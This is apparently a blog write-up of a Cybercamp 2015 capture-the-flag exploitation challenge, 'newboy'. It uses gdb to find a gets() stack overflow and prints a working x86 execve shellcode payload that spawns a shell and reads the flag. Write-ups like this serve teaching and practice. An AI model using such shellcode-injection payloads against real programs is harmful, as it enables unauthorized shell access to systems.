[Cybercamp 2015] [Exploit 1] Write Up

Description

./newboy
Hey, im newboy, nice to meet you!
Tell me, who am I speaking to? 0x90r00t
My pleasure, 0x90r00t 🙂

newboy.zip

Resolution

We start debug to find the size of the stack allocated :

0x08048469: sub esp,0x94
(gdb) p/d 0x94 = 148

We know our buffer is less than 148 bytes.

0x080484ab <+80>: lea eax,[ebp-0x95]
0x080484b1 <+86>: push eax
0x080484b2 <+87>: call 0x8048320 &lt;gets@plt&gt;

Here the program stores the $name in ebp-0x95. The program gets the name with insecure method at 0x080484b2 and stores it in ebp-0x95 as seen previously, then calls EAX

0x080484ba <+95>: lea eax,[ebp-0x15]
0x080484bd <+98>: call eax

EAX contains EBP-0x15 value. We want to place some shellcode here to spawn a shell. This can be done with our buffer overflow.

To determine the buffer size of the $name var needed to overflow, we need to determine the size beetween the adress ebp-0x95 (buffer starting address) and the adress called by EAX (ebp-0x15).

(gdb) p $ebp-0x15 = 0xbffff483
(gdb) p $ebp-0x95 = 0xbffff403
(gdb) p/d 0xbffff483 - 0xbffff403 = 128

So our buffer have a 128 bytes size. We can overflow the 0xbffff483 address with the get() at 0x080484b2. In order to verify our analyze we set a breakpoint on “call 0x8048320 <gets@plt>” located at 0x080484b2 :

(gdb) b *0x080484b2

We start the debug to overwrite ebp-0x15 that will be called by “0x080484bd <+98>: call eax”

(gdb) run <<< $(python -c 'print "\x90"*128 + "AAAA"')

At this moment the program doesn’t store yet our string given in argument, to verify we check the value of ebp-0x15 :

(gdb) x/xw 0xbffff483 0xbffff483: 0xccccccc3

Not yet overflowed. We go to the next instruction to verify if the overflow succeeded

(gdb) n
(gdb) x/xw 0xbffff483
0xbffff483: 0x41414141

=> Overflowed by our string !

So we can inject shellcode here by replacing AAAA by our shellcode :

(gdb) run <<< $(python -c 'print "\x90"*128 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
process 4314 is executing new program: /bin/dash

So let’s go to try in real :

$ python -c 'print "\x90"*128 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"' | ./newboy

=> No segfault but shell closed directly.

We force the shell to wait command with cat :

$ (python -c 'print "\x90"*128 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"' && cat) | ./newboy

-> Access granted

 

cat flag.txt
e50bb99725defaa4d275d09cd829440657741e7a674d757c0120158d552011fd

Thanks for reading !

2 thoughts on “[Cybercamp 2015] [Exploit 1] Write Up”

Leave a Reply

Your email address will not be published. Required fields are marked *